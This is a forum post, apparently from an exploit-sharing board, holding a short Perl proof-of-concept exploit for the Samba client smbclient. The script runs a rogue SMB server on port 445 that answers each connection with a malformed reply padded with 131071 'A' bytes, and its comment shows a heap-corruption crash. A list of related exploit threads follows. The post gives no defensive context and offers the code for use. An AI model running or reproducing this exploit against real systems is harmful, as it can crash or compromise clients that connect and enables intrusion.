![]() |
|
|
|||||||
| Notices |

Register Now for FREE!
|
![]() |
|
|
LinkBack | Thread Tools | Display Modes |
|
|
#1 (permalink) |
|
Studentz
![]() |
Code:
#!/usr/bin/perl
# 06/01/2008 - k`sOSe
#
# ~ # smbclient //localhost/w00t
# *** glibc detected *** smbclient: free(): invalid next size (fast): 0x0823c2d8 ***
#
use warnings;
use strict;
use IO::Socket;
my $sock = IO::Socket::INET->new(LocalAddr => '0.0.0.0', LocalPort => '445', Listen => 1, Reuse => 1) || die($!);
while(my $csock = $sock->accept())
{
print $csock "\x00" .
"\x01\xff\xff" .
"\x41" x 131071;
}
__________________
To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts. |
|
|
|
![]() |
| Bookmarks |
| Currently Active Users Viewing This Thread: 1 (0 members and 1 guests) | |
| Thread Tools | |
| Display Modes | |
|
|
Similar Threads
|
||||
| Thread | Thread Starter | Forum | Replies | Last Post |
| Document Imaging SDK Buffer Overflow Vulnerability | Wh!5t|eR | Exploit Codes | 1 | 07-18-2008 11:57 PM |
| SecurityGateway 1.0.1 (username) Remote Buffer Overflow PoC | Armageddon | Exploit Codes | 1 | 06-10-2008 11:49 AM |
| SecurityGateway 1.0.1 Remote Buffer Overflow | UnknownBug | Exploit Codes | 1 | 06-10-2008 01:45 AM |
| Now SMS/MMS Gateway 5.5 Remote Buffer Overflow Exploit | ThE KinG | Exploit Codes | 0 | 06-06-2008 03:54 PM |
| SMS/MMS Gateway v5.5 Remote Buffer Overflow | Intruder | Exploit Codes | 0 | 06-01-2008 01:12 PM |